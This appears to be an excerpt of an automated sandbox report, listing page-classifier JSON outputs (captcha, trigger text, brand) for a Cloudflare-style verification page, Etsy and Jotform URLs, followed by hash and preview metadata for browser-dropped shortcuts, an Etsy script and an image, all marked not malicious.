                                                                                                                                                                                "trigger_text": "To verify you are human, finish the action below.",
                                                                                                                                                                                "prominent_button_name": "Verifying...",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": true,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://v2nt.molouscre.com/wZoRh/ Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                "trigger_text": "To verify you are human, finish the action below.",
                                                                                                                                                                                "prominent_button_name": "Success!",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": true,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://v2nt.molouscre.com/wZoRh/ Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Cloudflare"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://v2nt.molouscre.com/wZoRh/ Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Cloudflare"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/ Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": false,
                                                                                                                                                                                "trigger_text": "unknown",
                                                                                                                                                                                "prominent_button_name": "unknown",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/ Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": false,
                                                                                                                                                                                "trigger_text": "unknown",
                                                                                                                                                                                "prominent_button_name": "unknown",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/ Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Etsy"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/ Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Etsy"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                "trigger_text": "Verifying the device...",
                                                                                                                                                                                "prominent_button_name": "unknown",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Etsy"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": false,
                                                                                                                                                                                "trigger_text": "unknown",
                                                                                                                                                                                "prominent_button_name": "Shop this item",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": false,
                                                                                                                                                                                "trigger_text": "unknown",
                                                                                                                                                                                "prominent_button_name": "Shop this item",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": false,
                                                                                                                                                                                "trigger_text": "unknown",
                                                                                                                                                                                "prominent_button_name": "Shop this item",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": false,
                                                                                                                                                                                "trigger_text": "unknown",
                                                                                                                                                                                "prominent_button_name": "Shop this item",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Etsy"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": false,
                                                                                                                                                                                "trigger_text": "unknown",
                                                                                                                                                                                "prominent_button_name": "Shop this item",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Etsy"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Etsy"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Etsy"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": false,
                                                                                                                                                                                "trigger_text": "unknown",
                                                                                                                                                                                "prominent_button_name": "Shop this item",
                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Etsy"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2F Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": [
                                                                                                                                                                                  "Etsy"
                                                                                                                                                                                ]
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://submit.jotform.com/submit/242923371946059 Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "contains_trigger_text": true,
                                                                                                                                                                                "trigger_text": "Enter the message as it's shown",
                                                                                                                                                                                "prominent_button_name": "Submit Form",
                                                                                                                                                                                "text_input_field_labels": [
                                                                                                                                                                                  "Enter the message as it's shown",
                                                                                                                                                                                  "salt"
                                                                                                                                                                                ],
                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                              }
                                                                                                                                                                              URL: https://submit.jotform.com/submit/242923371946059 Model: claude-3-haiku-20240307
                                                                                                                                                                              ```json
                                                                                                                                                                              {
                                                                                                                                                                                "brands": []
                                                                                                                                                                              }
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 09:07:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2673
                                                                                                                                                                              Entropy (8bit):3.980927348532277
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5B6353FEBC0129BD918C5F458AA258B9
                                                                                                                                                                              SHA1:8AE2AD9E4DA7D8F7F7E05663B22EAA2B25956692
                                                                                                                                                                              SHA-256:648871A81287BB66980BB6BE6275B6EAA45758E03E46611904E8A2FBE70132F8
                                                                                                                                                                              SHA-512:2208C59AD1CA9082043B361799A4FD140EAABFF23A65F732DEB03E63D83AA67AA8DE137C5B9B94E9EAD4F1BD00608AD20828932D1D14E579A759926598C851AB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,..... ..#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 09:07:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2675
                                                                                                                                                                              Entropy (8bit):3.9979150421813587
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9CF5E22BE3F68BB36763F3810A72CB04
                                                                                                                                                                              SHA1:CDA0824283C99CCA34433DAF8000A62D5E192D31
                                                                                                                                                                              SHA-256:E27F5EB66A7B89454D6F2B52E26A7DD9F2170A8452AD4917C36179DA26C10777
                                                                                                                                                                              SHA-512:ECA340DEB5A9EF8F6D0BC2D0416648EA5F2B1AC748158BEF3B90C64A85353DFE6DBC6A3D99FAFEF70D07FFBA77BF3A526154DE86F4FB2DCE150DD9AF375B66FD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....-....#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2689
                                                                                                                                                                              Entropy (8bit):4.007648008228162
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C59DBC4645E39192904F178BD3EC13D0
                                                                                                                                                                              SHA1:123556E1E569DD32CBF185DFD300576D618ADEE7
                                                                                                                                                                              SHA-256:A45EFE7D3C4DFDD8F549D1870C84701E04BECEBFBA315552E97D37CB3759DCE2
                                                                                                                                                                              SHA-512:AFB79BB38A698F5C10256D58DDBB8AFD1DD4B22F5A7882149AA4D8C608367AE6825357F380EC33CA6B0F4164F6AF48F9C4BE5D741DC96A2B68A86D3F6BEBDC0F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 09:07:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                              Entropy (8bit):3.9966360378328534
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0DD669FF825FABA61C9A2AFB8C2BF0A6
                                                                                                                                                                              SHA1:D0040AA113FC4CC28313B50641B5CB65EC186973
                                                                                                                                                                              SHA-256:663BF6AFF1AAD10314B2E5F708E86FCADA7672F6B0B8F95C02A843C87F68BE65
                                                                                                                                                                              SHA-512:015A341E125CB7910825189A0482C291E2B689D87EB84C1814CCF31FEBFE30F267DF824AEF77153BE88835CF89BB6CEFFD393AC873C80694E297904256D4BB04
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.........#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 09:07:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                              Entropy (8bit):3.986038228036497
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C3A8866134D9C00666EACE6402820EB8
                                                                                                                                                                              SHA1:D064C786881C81CA28FEE2EE39BC58FD7DAE9EE0
                                                                                                                                                                              SHA-256:097E7CC0A1406846C1EC6BC9E56222051A0FC45C35E015A073C07C61861B761A
                                                                                                                                                                              SHA-512:37CFADCEA1C98BB41634D0E7E45B5BCA4714A322696401CFE1D02A1A8DBD1EE9A87CCBAB59FA36D05CB4BCEE00DC6654E87F3FD90E6D6AE602DE4233B1FBA2E5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....@...#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 09:07:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2679
                                                                                                                                                                              Entropy (8bit):3.992576062695967
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B359A80504EA43E02EB6F46259688CC9
                                                                                                                                                                              SHA1:E4D894252730659910C09267DCD74E872106529B
                                                                                                                                                                              SHA-256:A58B94E392130C315C82B2E90D07A6409D97A60237B0A56CE236DE0DDBA5504E
                                                                                                                                                                              SHA-512:CF59F395887D4A39FEBCDC76DB963BFD49292A9C3A55FB12B62775079B2BD570061D250DB6750C9C63332F100FC37219BDA2FEE519C990DF48B728FE4F5923D7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....A....#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5674)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5857
                                                                                                                                                                              Entropy (8bit):5.254818775741915
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2ACEE75DC27622F10B17619BDB63D0AA
                                                                                                                                                                              SHA1:66C63B402CC52620F0080CDA55B64B88BE78869C
                                                                                                                                                                              SHA-256:A5D3B7BBE2DC3ED87FDFCEBB97AA07FD9CFFCCE7D927EC6672A7B9B142993E9E
                                                                                                                                                                              SHA-512:CF550122DBA854CF4A20907B2C891191AFD507A15BDA72FD954AAA8BB24A74C88F332CA4D4A730D46D504EE4243E9E51065BDFF006A59BD4CDC7688554777B3A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/async/common-entrypoints/auto/@etsy-modules/CategoryNav/Views/DropdownMenu/Menu.8b0e09237e9cf469a07a.js
                                                                                                                                                                              Preview:"use strict";(self["jsonp-common-entrypoints"]=self["jsonp-common-entrypoints"]||[]).push([[6464],{7878:(e,t,n)=>{n.r(t);n.d(t,{DropdownMenu:()=>f});var i=n(73035);var o=n(31562);var r=n(32703);var a=n(20266);var s=n(78661);var d=n(23860);var l=n(93319);function u(e,t,n){t in e?Object.defineProperty(e,t,{value:n,enumerable:true,configurable:true,writable:true}):e[t]=n;return e}const c={CONTEXT:".dropdown-category-menu",MENU_BODY:".dropdown-category-menu__body"};const h={KEY:"submenu",NAME:"Etsy\\Modules\\CategoryNav\\Specs\\DropdownCatNav\\DropdownSubmenu"};const p=2;const v=200;class f{constructor(){u(this,"context",null);u(this,"menu",null);u(this,"nodes",[]);u(this,"activeNodes",[]);u(this,"parentNodes",[]);this.context=document.querySelector(c.CONTEXT);this.loadSpec()}loadSpec(){o["default"].fetchOne(h.KEY,h.NAME,{},"GET",true).done((e=>{if(e.output&&e.output[h.KEY]){var t;const n=null===(t=this.context)||void 0===t?void 0:t.querySelector(o["default"].DEFAULT_PLACEHOLDER_SELECTOR);
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):62498
                                                                                                                                                                              Entropy (8bit):7.956301158721701
                                                                                                                                                                              Encrypted:false
